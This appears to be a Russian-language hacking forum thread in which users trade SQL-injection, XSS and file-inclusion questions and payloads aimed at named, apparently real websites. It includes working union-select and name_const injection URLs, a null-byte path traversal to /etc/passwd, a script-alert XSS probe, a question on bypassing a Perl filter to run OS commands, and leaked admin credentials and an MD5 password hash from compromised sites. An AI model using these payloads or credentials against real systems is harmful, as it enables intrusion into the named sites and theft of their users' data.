http://zub.by/page.php?form_id=-75 Version 5.0.51a-24+lenny2+spu1 Database zubby User zubby@localhost OS debian-linux-gn Tables cms_system_users id 1 Name Администратор Login admin Password sa смаотри еще таблицу pl_user_user uname test upassword test
реакция на знак равенства, переменная id не попадает в SQL запрос Code: http://topok.com.ua/services.php?id=22/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)
а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ Code: Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s):
Нужна тулза, для работы со blind sql-inj, 5 ветка. причем чтоб работала по https и с куками)). пох на платформу. зы: Перловый гуй от Электа - под виндами требует ссл, который под актив перл не ставится изза ошибки - undef error. соответственно хз как фиксить)) Придется перечислить что пробовал: sipt,toolza,elekt antichat mysql.... Тулза не поддерживает пока хттпс. Сипт вроде тож.
Такой вопрос, допустим я нашёл таблицу в которой содержатся логин и пасс админа http://xxx/page.php?form_id=-75+union+select+1,2,3,4,5+from+cms_system_users+limit+0,1-- Узнать название столбца содержащее логин админа можно только перебирая названия типа admin, user,users, login, password , т.е. только методом перебора напр. так: http://xxx/page.php?form_id=-75+union+select+1,2,3,4,admin+from+cms_system_users+limit+0,1-- http://xxx/page.php?form_id=-75+union+select+1,2,3,4,column_name+from cms_system_users+limit+0,1-- (так тоже не выходит) или как можно узнать названия столбцов в существующей таблице?только перебором? в факах не понял смысла, help please
неполучаеться обойти xss фильтр ввожу "'><script>alert(12345)</script> на выходе "'><script>alert(12345)</script>
MySQl 5'тая версия.. когда делаю UNION либо SELECT(без union) то выходит белый экран.. что это может быть? также прбовал с char/hex
Похоже на htmlspecialchars() , его обойти можно только если твоя ксс будет в ссылке с кодировкой UTF-7 нипанятна, а где скуля ? А тут 4 ветка, смотри в топ 5 сайтов. Вывести кажись не получиться т.к. там юнион использовать скорей всего нельзя , ну во всяком случае у меня не вышло
нашёл скулю в одном очень вкусном портале логин и пасс в таком виде: admin:4b2f0bd7133666807c1813fef7343777 4b2f0bd7133666807c1813fef7343777-это md5? как теперь быть?путь к админке есть
код странички на перле: Code: $paramX =~s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g; if ($paramX "") { my $status=`$xx_cgidir/xyz.pl -m -e $paramX`; возможен ли обход фильтра и исполнение кода в ос ?
на сайте есть скуль. я подобрал колличество строк. но после этого начало выдавать. Application uses a value of the wrong type for the current operation. А на точто неверное кол-во столбцов ругаться перестало. О чем это может говорить?Пробывал вставлять version() результат такой же запрос такого вида http://megamegamegeporn.gov/latest.asp?ID=&offset=&prod_id=8896%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,version()--